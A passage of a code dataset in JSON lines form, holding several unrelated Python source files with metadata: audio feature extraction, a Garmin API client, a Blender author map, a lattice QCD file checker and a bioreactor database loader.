4.0/3.0*pi*pow(rs,3) )\n xcpot_pw92 = XC_PW92()\n plot(rho, xcpot_pw92.vxc(rho))\n\n xcpot_vwn = XC_VWN()\n plot(rho, xcpot_vwn.vxc(rho), \"o\")\n \n show()\n", "repo_name": "humeniuka/DFTBaby", "sub_path": "DFTB/SlaterKoster/XCFunctionals.py", "file_name": "XCFunctionals.py", "file_ext": "py", "file_size_in_byte": 4532, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.exp", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 36, "usage_type": "name"}, {"api_name": "numpy.pi", "line_number": 38, "usage_type": "name"}, {"api_name": "numpy.pi", "line_number": 42, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 49, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.arctan", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 96, "usage_type": "name"}, {"api_name": "numpy.pi", "line_number": 98, "usage_type": "name"}, {"api_name": "numpy.pi", "line_number": 105, "usage_type": "name"}, {"api_name": "numpy.pi", "line_number": 112, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 128, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 133, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 135, "usage_type": "call"}]} +{"seq_id": "27059279113", "text": "#! 
/usr/bin/python3\n\n\nimport numpy as np\nfrom scipy import signal\nimport librosa\n\n\n\ndef get_segment_features_from_file(filename, sample_rate=16000):\n\ty,_ = librosa.core.load(filename, sample_rate)\n\treturn get_segment_features(y, sample_rate)\n\n\ndef get_segment_features(y, sample_rate, frame_length=0.025, hop_length=0.010, frames_per_segment=25):\n\n\tframe_length_s = int(sample_rate * frame_length)\n\thop_length_s = int(sample_rate * hop_length)\n\t# print(\"frame_length_s:\", frame_length_s)\n\t# print(\"hop_length_s:\", hop_length_s)\n\n\tyt,_ = librosa.effects.trim(y, top_db=5)\n\t# print(\"Len: Original\", len(y), \"Trimmed\", len(yt))\n\n\t# Pad with zeros, to match behaviour of mfcc with yt while getting frames from yp\n\typ = np.concatenate([np.zeros(frame_length_s//2), yt, np.zeros(frame_length_s//2)]) \t\n\n\tframes = librosa.util.frame(yp,frame_length_s, hop_length_s)\n\tframes = frames.T\n\n\n\tmfcc = librosa.feature.mfcc(y=yt, sr=sample_rate, n_fft=frame_length_s, hop_length=hop_length_s)\t\n\tmfcc_d = librosa.feature.delta(mfcc)\n\tmfcc_dd = librosa.feature.delta(mfcc, order=2)\n\n\tframe_features_mfcc = mfcc.T\n\tframe_features_mfcc_d = mfcc_d.T\n\tframe_features_mfcc_dd = mfcc_dd.T\n\n\tthreshold = 0.015\n\t# threshold = 0.0\n\n\tframe_features_pitch = np.empty((0,2))\n\tfor frame in frames:\n\n\t\tif np.max(frame) < threshold or np.min(frame) > threshold:\n\t\t\tframe_features_pitch = np.vstack((frame_features_pitch, [np.nan, np.nan]))\n\t\t\tcontinue\n\n\t\tfeature_pitch_period = get_feature_pitch_period(frame, sample_rate)\n\t\tfeature_hnr = get_feature_hnr(frame, sample_rate, feature_pitch_period[0])\n\n\t\tfeature_pitch = np.concatenate([feature_pitch_period, feature_hnr])\n\t\tframe_features_pitch = np.vstack((frame_features_pitch, feature_pitch))\n\t# print(\"Num of frames:\", len(frame_features_pitch))\n\n\n\tframe_features = np.hstack((frame_features_pitch,frame_features_mfcc,frame_features_mfcc_d,frame_features_mfcc_dd))\n\n\t# Remove features of frames which were added by np.zeros()\n\tnum_frames_remove = np.ceil(frame_length_s/2/hop_length_s).astype(int)\n\tframe_features = frame_features[num_frames_remove:-num_frames_remove,:]\n\n\tsegment_features = np.empty((0, frame_features.shape[1]*frames_per_segment ))\n\tfor i in range(frames_per_segment//2, len(frame_features)-frames_per_segment//2):\n\t\tw = frames_per_segment//2\n\t\tfeature = np.ravel(frame_features[i-w:i-w+frames_per_segment])\n\n\t\t# Discard invalid segment\n\t\tif np.isnan(feature).any():\n\t\t\tcontinue\n\n\t\tsegment_features = np.vstack((segment_features, feature))\n\n\t# print(\"Num of segments\", len(segment_features))\n\n\treturn segment_features\n\n\ndef get_feature_pitch_period(frame, sample_rate):\n\tcorr = np.correlate(frame, frame, \"same\")\n\tcorr = corr[len(corr)//2:]\n\n\tcorr_diff = np.diff(corr)\n\n\ttry:\n\t\tidx_low_first = np.where(corr_diff > 0)[0][0]\n\t\tidx_hi_second = np.argmax(corr[idx_low_first:]) + idx_low_first\n\texcept IndexError as e:\n\t\treturn [np.nan]\n\t\t# Noisy?\n\n\tpitch_period = sample_rate/idx_hi_second\n\n\treturn [pitch_period]\n\n\ndef get_feature_hnr(frame, sample_rate, pitch_period):\n\n\tif np.isnan(pitch_period):\n\t\treturn [np.nan]\n\n\tdef autocorr(frame,t):\n\t\treturn [np.corrcoef(frame[0:frame.size-t],frame[t:frame.size])[0,1]]\n\n\ttau = np.rint(sample_rate/pitch_period).astype(int)\n\n\ttry:\n\t\tacf_0 = np.abs(autocorr(frame,0))\n\t\tacf_tau = np.abs(autocorr(frame,tau))\n\t\thnr = 10*np.log(acf_tau/(acf_0 - acf_tau))\n\texcept 
ValueError as e:\n\t\thnr = [np.nan]\n\n\treturn hnr\n", "repo_name": "RohitG28/Audio-Emotion-Recognition", "sub_path": "src/seg_ftr_extraction.py", "file_name": "seg_ftr_extraction.py", "file_ext": "py", "file_size_in_byte": 3388, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "librosa.core.load", "line_number": 11, "usage_type": "call"}, {"api_name": "librosa.core", "line_number": 11, "usage_type": "attribute"}, {"api_name": "librosa.effects.trim", "line_number": 22, "usage_type": "call"}, {"api_name": "librosa.effects", "line_number": 22, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 26, "usage_type": "call"}, {"api_name": "librosa.util.frame", "line_number": 28, "usage_type": "call"}, {"api_name": "librosa.util", "line_number": 28, "usage_type": "attribute"}, {"api_name": "librosa.feature.mfcc", "line_number": 32, "usage_type": "call"}, {"api_name": "librosa.feature", "line_number": 32, "usage_type": "attribute"}, {"api_name": "librosa.feature.delta", "line_number": 33, "usage_type": "call"}, {"api_name": "librosa.feature", "line_number": 33, "usage_type": "attribute"}, {"api_name": "librosa.feature.delta", "line_number": 34, "usage_type": "call"}, {"api_name": "librosa.feature", "line_number": 34, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 47, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.ravel", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.correlate", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 90, "usage_type": "attribute"}, {"api_name": "numpy.isnan", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 101, "usage_type": "attribute"}, {"api_name": "numpy.corrcoef", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.rint", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 113, "usage_type": "attribute"}]} +{"seq_id": "25238103516", "text": "\"\"\"Clients to help interface with various APIs used for collection.\"\"\"\n\nfrom random import randint\nfrom datetime import datetime\n\nfrom garminexport.garminclient import GarminClient, require_session\n\n\nclass 
UserGarminClient(GarminClient):\n \"\"\"Add the ability to get a daily activity report from the GarminExport project.\"\"\"\n @require_session\n def get_daily_report(self, token: str, day: datetime) -> dict:\n \"\"\"Download the daily activity report from Garmin using the built-in session capability.\n\n :param token: the Garmin API token\n :param day: the datetime to collect\n :returns: the response from Garmin\n\n \"\"\"\n day_string = day.isoformat().split('T')[0]\n cache_buster = randint(100000, 1000000)\n url = f'https://connect.garmin.com/modern/proxy/usersummary-service/usersummary/daily/{token}?calendarDate={day_string}&_={cache_buster}'\n print(f'Making call to {url}')\n response = self.session.get(url)\n return response.json()\n", "repo_name": "oxhacks/goalposts", "sub_path": "goalposts/clients.py", "file_name": "clients.py", "file_ext": "py", "file_size_in_byte": 1011, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "garminexport.garminclient.GarminClient", "line_number": 9, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 12, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 21, "usage_type": "call"}, {"api_name": "garminexport.garminclient.require_session", "line_number": 11, "usage_type": "name"}]} +{"seq_id": "15879873209", "text": "__all__ = (\n \"sha1_authors_map\",\n)\n\nfrom typing import (\n Dict,\n Tuple,\n)\n\n\ndef sha1_authors_map() -> Dict[bytes, Tuple[str, ...]]:\n \"\"\"\n Return SHA1 to authors map.\n \"\"\"\n # Mapping from a commit hash to additional authors.\n # Fully overwrite authors gathered from git commit info.\n # Intended usage: Correction of info stored in git commit itself.\n # Note that the names of the authors here are assumed fully valid and usable as-is.\n return {\n # Format: {full_git_hash: (tuple, of, authors),}.\n # Author was: `blender `.\n b\"ba3d49225c9ff3514fb87ae5d692baefe5edec30\": (\"Sergey Sharybin \", ),\n # Author was: `Author Name `.\n b\"4b6a4b5bc25bce10367dffadf7718e373f81f299\": (\"Antonio Vazquez \", ),\n }\n", "repo_name": "blender/blender", "sub_path": "tools/utils/git_data_sha1_override_authors.py", "file_name": "git_data_sha1_override_authors.py", "file_ext": "py", "file_size_in_byte": 859, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 10105, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.Dict", "line_number": 11, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 11, "usage_type": "name"}]} +{"seq_id": "8215245515", "text": "from __future__ import print_function\nimport os, sys, argparse, shutil, datetime, time\nimport numpy as np\nnp.set_printoptions(linewidth=180)\nimport tables as h5\nimport warnings\nwarnings.simplefilter('ignore', h5.NaturalNameWarning)\nfrom glob import glob\nfmt = '%Y-%m-%d %H:%M:%S'\n\n'''\n NUCLEON_ELASTIC_FF IMPORTS\n'''\nsys.path.append(os.path.join(os.path.dirname(__file__)))\nsys.path.append(os.path.join(os.path.dirname(__file__),'area51_files'))\nimport importlib\nimport c51_mdwf_hisq as c51\nimport utils\nimport sources\nens,stream = c51.ens_base()\nens_s = ens+'_'+stream\n\narea51 = importlib.import_module(ens)\nparams = area51.params\nparams['machine'] = c51.machine\nparams['ENS_LONG'] = c51.ens_long[ens]\nparams['ENS_S'] = ens_s\nparams['STREAM'] = stream\n\nprint('ENSEMBLE:',ens_s)\n\n'''\n COMMAND LINE ARG PARSER\n'''\nparser = argparse.ArgumentParser(description='get spec data from h5 
files')\nparser.add_argument('cfgs', nargs='+',type=int,help='cfgs: ci [cf dc]')\nparser.add_argument('-t','--t_sep',nargs='+',type=int,help='values of t_sep [default = all]')\nparser.add_argument('--src_set', nargs=3,type=int,help='specify si sf ds')\nparser.add_argument('-s','--src', type=str,help='src [xXyYzZtT] None=All')\nparser.add_argument('-o', default=False,action='store_const',const=True, help='overwrite? [%(default)s]')\nparser.add_argument('--move', default=False,action='store_const',const=True, help='move bad files? [%(default)s]')\nparser.add_argument('-v', default=True, action='store_const',const=False,help='verbose? [%(default)s]')\nparser.add_argument('--collect', default=False,action='store_const',const=True, help='try collecting from ff_4D files? [%(default)s]')\nparser.add_argument('--curr_4D', default=False,action='store_const',const=True, help='use 4D current selection? [%(default)s]')\nargs = parser.parse_args()\nprint('Arguments passed')\nprint(args)\nprint('')\n\ndtype = np.complex64\ndata_dir = c51.data_dir % params\nutils.ensure_dirExists(data_dir)\n\nif 'si' in params and 'sf' in params and 'ds' in params:\n tmp_params = dict()\n tmp_params['si'] = params['si']\n tmp_params['sf'] = params['sf']\n tmp_params['ds'] = params['ds']\n params = sources.src_start_stop(params,ens,stream)\n params['si'] = tmp_params['si']\n params['sf'] = tmp_params['sf']\n params['ds'] = tmp_params['ds']\nelse:\n params = sources.src_start_stop(params,ens,stream)\nif args.src_set:# override src index in sources and area51 files for collection\n params['si'] = args.src_set[0]\n params['sf'] = args.src_set[1]\n params['ds'] = args.src_set[2]\nsrc_ext = \"%d-%d\" %(params['si'],params['sf'])\nparams['SRC_SET'] = src_ext\ncfgs_run,srcs = utils.parse_cfg_src_argument(args.cfgs,args.src,params)\nsmr = 'gf'+params['FLOW_TIME']+'_w'+params['WF_S']+'_n'+params['WF_N']\nval = smr+'_M5'+params['M5']+'_L5'+params['L5']+'_a'+params['alpha5']\nval_p = val.replace('.','p')\n\nmv_l = params['MV_L']\nparams['MQ'] = mv_l\n\nflav_spin = []\nfor flav in params['flavs']:\n for spin in params['spins']:\n flav_spin.append(flav+'_'+spin)\n''' ONLY doing snk_mom 0 0 0 now '''\nsnk_mom = params['snk_mom'][0]\nm0,m1,m2 = snk_mom.split()\nparams['M0']=m0\nparams['M1']=m1\nparams['M2']=m2\nparams['MOM'] = 'px%spy%spz%s' %(m0,m1,m2)\n\nif args.t_sep == None:\n pass\nelse:\n params['t_seps'] = args.t_sep\nprint('getting t_sep values')\nprint(params['t_seps'])\n\n# If 0-mom files are missing, we can reconstruct from the 4D files\n# but missing the T12, T34 and CHROMO_MAG operators\nif args.collect and not args.curr_4D:\n sys.exit('to collect from 4D files, we must restrict the currents with --curr_4D')\nif args.curr_4D:\n currents = params['curr_4d']\nelse:\n currents = params['curr_0p']\n\nmissing_ff_files = []\ncollect_files = []\nfor cfg in cfgs_run:\n no = str(cfg)\n print(no)\n try:\n f5 = h5.open_file(data_dir+'/'+ens_s+'_'+no+'_srcs'+src_ext+'.h5','r')\n have_data_cfg = True\n except:\n have_data_cfg = False\n params['CFG'] = no\n params = c51.ensemble(params)\n for tsep in params['t_seps']:\n params['T_SEP'] = tsep\n params['N_SEQ'] = len(srcs[cfg])\n if ens_s == 'a15m310Lindvdl_a':\n params['N_SEQ'] = 1\n for src in srcs[cfg]:\n params['SRC'] = src\n src_split = sources.src_split(src)\n t_src = src.split('t')[1]\n ff_name = c51.names['formfac'] % params\n ff_file = params['formfac'] +'/'+ ff_name+'.h5'\n if not have_data_cfg:\n if os.path.exists(ff_file):\n collect_files.append(ff_file)\n else:\n 
missing_ff_files.append(ff_file)\n else:\n mq = params['MQ'].replace('.','p')\n ff_dir = '/'+val_p+'/formfac/ml'+mq\n for corr in params['particles']:\n dt = str(tsep)\n if '_np' in corr:\n dt = '-'+dt\n for fs in flav_spin:\n ff_out = corr+'_'+fs+'_tsep_'+dt+'_sink_mom_px0_py0_pz0'\n for curr in currents:\n p_lst = ['px0_py0_pz0']\n for mom in p_lst:\n h5_data = ff_dir+'/'+ff_out+'/'+curr+'/'+mom+'/'+src\n if h5_data not in f5.get_node('/'):\n if os.path.exists(ff_file) and ff_file not in collect_files:\n collect_files.append(ff_file)\n elif not os.path.exists(ff_file) and ff_file not in missing_ff_files:\n missing_ff_files.append(ff_file)\n elif not os.path.exists(ff_file) and ff_file in missing_ff_files:\n pass\n elif os.path.exists(ff_file) and ff_file in collect_files:\n pass\n else:\n print('CONFUSED')\n print(os.path.exists(ff_file),ff_file.split('/')[-1])\n if have_data_cfg: \n f5.close()\n else:\n print('missing ',data_dir+'/'+ens_s+'_'+no+'_srcs'+src_ext+'.h5')\n\nif len(missing_ff_files) > 0:\n print('missing %d formfac files' %(len(missing_ff_files)))\n tmp = open('missing_check_formfac_Srcs'+src_ext+'.lst','w')\n for f in missing_ff_files:\n no,ff = f.split('/')[-2],f.split('/')[-1]\n tmp.write(no+'/'+ff+'\\n')\n tmp.close()\n\nif len(collect_files) > 0:\n print('collect %d data sets' %(len(collect_files)))\n time.sleep(2)\n tmp = open('collect_formfac_Srcs'+src_ext+'.lst','w')\n for f in collect_files:\n no,ff = f.split('/')[-2],f.split('/')[-1]\n #print(no,ff)\n tmp.write(no+'/'+ff+'\\n')\n tmp.close()\n\n''' turn off for now as we may also be missing spec files\nif args.collect:\n for ff in missing_ff_files:\n ff_4D = ff.replace('formfac','formfac_4D')\n ff_4D_tslice = ff.replace('formfac','formfac_4D_tslice')\n if os.path.exists(ff_4D) or os.path.exists(ff_4D_tslice):\n no = ff_4D.split(ens_s)[2].split('_')[1]\n src = ff_4D.split('_')[-2]\n src_split = sources.src_split(src)\n x0,y0,z0,t0 = sources.xyzt(src)\n tsep = ff_4D.split('_dt')[1].split('_')[0]\n mq = params['MQ'].replace('.','p')\n ff_dir = '/'+val_p+'/formfac/ml'+mq\n for corr in params['particles']:\n dt = str(tsep)\n if '_np' in corr:\n dt = '-'+dt\n for fs in flav_spin:\n ff_out = corr+'_'+fs+'_tsep_'+dt+'_sink_mom_px0_py0_pz0'\n for curr in currents:\n ff_4D_dir = '/'+corr+'_'+fs+'_t0_'+t0+'_tsep_'+dt+'_sink_mom_px0_py0_pz0/'+curr+'/'+src_split+'/4D_correlator/local_current'\n if os.path.exists(ff_4D):\n file_4D = h5.open_file(ff_4D,'r')\n data_4D = file_4D.get_node(ff_4D_dir)\n print(no,src,curr,dt,data_4D.shape)\n file_4D.close()\n'''\n", "repo_name": "callat-qcd/nucleon_elastic_FF", "sub_path": "scripts/check_formfac.py", "file_name": "check_formfac.py", "file_ext": "py", "file_size_in_byte": 8292, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.set_printoptions", "line_number": 4, "usage_type": "call"}, {"api_name": "warnings.simplefilter", "line_number": 7, "usage_type": "call"}, {"api_name": "tables.NaturalNameWarning", "line_number": 7, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 14, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 14, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 15, "usage_type": "call"}, {"api_name": 
"sys.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 15, "usage_type": "call"}, {"api_name": "c51_mdwf_hisq.ens_base", "line_number": 20, "usage_type": "call"}, {"api_name": "importlib.import_module", "line_number": 23, "usage_type": "call"}, {"api_name": "c51_mdwf_hisq.machine", "line_number": 25, "usage_type": "attribute"}, {"api_name": "c51_mdwf_hisq.ens_long", "line_number": 26, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.complex64", "line_number": 50, "usage_type": "attribute"}, {"api_name": "c51_mdwf_hisq.data_dir", "line_number": 51, "usage_type": "attribute"}, {"api_name": "utils.ensure_dirExists", "line_number": 52, "usage_type": "call"}, {"api_name": "sources.src_start_stop", "line_number": 59, "usage_type": "call"}, {"api_name": "sources.src_start_stop", "line_number": 64, "usage_type": "call"}, {"api_name": "utils.parse_cfg_src_argument", "line_number": 71, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 101, "usage_type": "call"}, {"api_name": "tables.open_file", "line_number": 113, "usage_type": "call"}, {"api_name": "c51_mdwf_hisq.ensemble", "line_number": 118, "usage_type": "call"}, {"api_name": "sources.src_split", "line_number": 126, "usage_type": "call"}, {"api_name": "c51_mdwf_hisq.names", "line_number": 128, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 131, "usage_type": "call"}, {"api_name": "os.path", "line_number": 131, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 149, "usage_type": "call"}, {"api_name": "os.path", "line_number": 149, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 151, "usage_type": "call"}, {"api_name": "os.path", "line_number": 151, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 153, "usage_type": "call"}, {"api_name": "os.path", "line_number": 153, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 155, "usage_type": "call"}, {"api_name": "os.path", "line_number": 155, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 159, "usage_type": "call"}, {"api_name": "os.path", "line_number": 159, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 175, "usage_type": "call"}]} +{"seq_id": "12786849402", "text": "import os\nimport pandas as pd\n\nfrom constants import *\n\nfrom utils import findOccurrences, transformStringIntoList\nfrom import_into_database.yml_functions import read_yml\nfrom import_into_database.bash_functions import clusterHeaders, getFiles\nimport db_functions as db\n\ndef populate_db(args):\n '''\n This function reads the yml file with the information to populate the database and parses it depending on the keys of the values.\n It calls functions to set the biological replicate/perturbation/replicate ids or gets them from the yml file\n It calls db functions to introduce the information in the corresponding db tables\n\n :param args: user input choice\n '''\n info_file = args.info_file\n info = read_yml(info_file)\n\n if 'STUDY' in info:\n study = {\n 'studyName': info['STUDY'][0]['NAME'],\n 'studyDescription': info['STUDY'][0]['DESCRIPTION']\n }\n study_filtered = {k: v for k, v in study.items() if v is not None}\n if len(study_filtered)>0:\n study_id = 
db.addRecord('Study', study_filtered)\n print('\\nSTUDY ID: ', study_id)\n else: \n print('You must introduce some study information')\n exit()\n \n elif 'STUDY_ID' in info:\n study_id = info['STUDY_ID']\n print('\\nSTUDY ID: ', study_id)\n \n\n if 'BIOLOGICAL_REPLICATE' in info:\n biological_replicates = info['BIOLOGICAL_REPLICATE'] \n for biological_replicate in biological_replicates:\n # ------------------------------------------------------------------------------------\n # REACTOR ==> REACTOR_ID\n reactor = {\n 'reactorName': biological_replicate['REACTOR']['NAME']['value'],\n 'volume': \"{:.2f}\".format(biological_replicate['REACTOR']['VOLUME']['value']),\n 'atmosphere': \"{:.2f}\".format(biological_replicate['REACTOR']['ATMOSPHERE']['value']),\n 'stirring_speed': \"{:.2f}\".format(biological_replicate['REACTOR']['STIRRING_SPEED']['value']),\n 'reactorMode': biological_replicate['REACTOR']['MODE']['value'],\n 'reactorDescription': biological_replicate['REACTOR']['DESCRIPTION']['value'],\n }\n reactor_filtered = {k: v for k, v in reactor.items() if v is not None}\n if len(reactor_filtered)>0: reactor_id = db.addRecord('Reactor',reactor_filtered)\n else: reactor_id=None\n print('\\tREACTOR ID: ', reactor_id)\n \n # ------------------------------------------------------------------------------------\n # PRECULTIVATION ==> PRECULTIVATION_ID \n precultivation_id = None\n print('\\tPRECULTIVATION ID: ', precultivation_id)\n \n # ------------------------------------------------------------------------------------\n # MEDIA ==> MEDIA_ID\n if biological_replicate['MEDIA']['MEDIA_PATH']['value']:\n media_file = os.path.abspath(biological_replicate['MEDIA']['MEDIA_PATH']['value'])\n path_end = max(findOccurrences(media_file, \"/\"))\n media_file_name = media_file[path_end+1:]\n\n media_analysis_file = PROJECT_DIRECTORY + MEDIA_ANALYSIS_FILE\n media_args = [PROJECT_DIRECTORY, media_file, media_file_name]\n mediaFiles = getFiles(media_analysis_file, media_args, MEDIA_LIST)\n \n for i, f in enumerate(mediaFiles):\n media = {\n 'mediaName': biological_replicate['MEDIA']['NAME']['value'],\n 'mediaFile': f\n }\n media_filtered = {k: v for k, v in media.items() if v is not None}\n \n if len(media_filtered)>0: media_id = db.addRecord('Media',media_filtered)\n else: media_id=None\n \n print('\\tMEDIA ID: ', media_id)\n \n # ------------------------------------------------------------------------------------\n # ==> BiologicalReplicate table\n biol_rep_positions = transformStringIntoList(biological_replicate['PLATE']['POSITION']['value'], ',')\n biol_rep_dir = transformStringIntoList(biological_replicate['FILES']['value'], ',')\n\n for i, biol_rep_position in enumerate(biol_rep_positions):\n \n biological_id = setBiologicalReplicateId(study_id)\n \n biol_rep = {\n 'studyId': study_id,\n 'biologicalReplicateId': biological_id,\n 'reactorId': reactor_id,\n 'precultivationId': precultivation_id,\n 'mediaId': media_id,\n 'biologicalReplicateName': biological_replicate['NAME']['value'],\n 'plateId': biological_replicate['PLATE']['ID']['value'],\n 'platePosition': biol_rep_position,\n 'blank': biological_replicate['BLANK']['value'],\n 'inoculumConcentration': \"{:.2f}\".format(biological_replicate['INOCULUM_CONCENTRATION']['value']),\n 'inoculumVolume': \"{:.2f}\".format(biological_replicate['INOCULUM_VOLUME']['value']),\n 'initialPh': \"{:.2f}\".format(biological_replicate['INITIAL_PH']),\n 'initialTemperature': \"{:.2f}\".format(biological_replicate['INITIAL_TEMPERATURE']['value']),\n 'carbonSource': 
biological_replicate['CARBON_SOURCE']['value'],\n 'antibiotic': biological_replicate['ANTIBIOTIC']['value'],\n 'biologicalReplicateDescription': biological_replicate['DESCRIPTION']['value']\n }\n \n biological_replicate_filtered = {k: v for k, v in biol_rep.items() if v is not None}\n db.addRecord('BiologicalReplicate', biological_replicate_filtered)\n print('\\nBIOLOGICAL_REPLICATE ID: ', biological_id)\n\n # ------------------------------------------------------------------------------------\n # BACTERIA ==> if BLANK=False\n if biological_replicate['BLANK']['value'] == 0:\n bacterias = biological_replicate['BACTERIA']\n for bacteria in bacterias:\n bact = {\n 'bacteriaGenus': bacteria['GENUS'],\n 'bacteriaSpecies': bacteria['SPECIES'],\n 'bacteriaStrain': bacteria['STRAIN']\n }\n bacteria_filtered = {k: v for k, v in bact.items() if v is not None}\n\n if len(bacteria_filtered)>0: \n bacteria_id = db.addRecord('Bacteria',bacteria_filtered)\n community = {\n 'bacteriaId': bacteria_id,\n 'biologicalReplicateId': biological_id\n }\n community_filtered = {k: v for k, v in community.items() if v is not None}\n db.addRecord('BacteriaCommunity',community_filtered) \n\n ### Files analysis\n print(biol_rep_dir[i])\n if biol_rep_dir[i]:\n files_dir = os.path.abspath(biol_rep_dir[i]) + '/'\n\n biol_rep_analysis_file = PROJECT_DIRECTORY + BIOLOGICAL_REPLICATE_ANALYSIS_FILE\n biol_rep_args = [PROJECT_DIRECTORY, files_dir, biological_id]\n biol_rep_files = getFiles(biol_rep_analysis_file, biol_rep_args, BIOLOGICAL_REPLICATES_LIST)\n\n headers_dict = clusterHeaders(PROJECT_DIRECTORY + HEADERS_FILE)\n \n addReplicates(headers_dict, biol_rep_files, biological_id=biological_id, perturbation_id=None)\n \n elif 'BIOLOGICAL_ID' in info:\n biological_id = info['BIOLOGICAL_ID']\n print('\\nBIOLOGICAL_REPLICATE ID: ', biological_id)\n \n \n if 'PERTURBATION' in info:\n perturbations = info['PERTURBATION']\n for perturbation in perturbations:\n\n pert_positions = transformStringIntoList(perturbation['PLATE']['POSITION']['value'], ',')\n pert_dir = transformStringIntoList(perturbation['FILES']['value'], ',')\n\n for i, pert_position in enumerate(pert_positions):\n \n perturbation_id = setPerturbationId(biological_id)\n pert = {\n 'perturbationId': perturbation_id,\n 'biologicalReplicateId': biological_id,\n 'plateId': perturbation['PLATE']['ID']['value'],\n 'platePosition': pert_position,\n 'property': perturbation['PROPERTY']['value'],\n 'newValue': perturbation['NEW_VALUE']['value'],\n 'startTime': perturbation['STARTING_TIME']['value'],\n 'endTime': perturbation['ENDING_TIME']['value'],\n 'perturbationDescription': perturbation['DESCRIPTION']['value']\n }\n perturbation_filtered = {k: v for k, v in pert.items() if v is not None}\n db.addRecord('Perturbation', perturbation_filtered)\n print('\\nPERTURBATION ID: ', perturbation_id)\n\n ### Files analysis\n print(pert_dir[i])\n if pert_dir[i]:\n files_dir = os.path.abspath(pert_dir[i]) + '/'\n \n biol_rep_analysis_file = PROJECT_DIRECTORY + BIOLOGICAL_REPLICATE_ANALYSIS_FILE\n biol_rep_args = [PROJECT_DIRECTORY, files_dir, biological_id, perturbation_id]\n biol_rep_files = getFiles(biol_rep_analysis_file, biol_rep_args, BIOLOGICAL_REPLICATES_LIST) #this will generate the new HEADERS_FILE\n\n headers_dict = clusterHeaders(PROJECT_DIRECTORY + HEADERS_FILE)\n\n addReplicates(headers_dict, biol_rep_files, biological_id=biological_id, 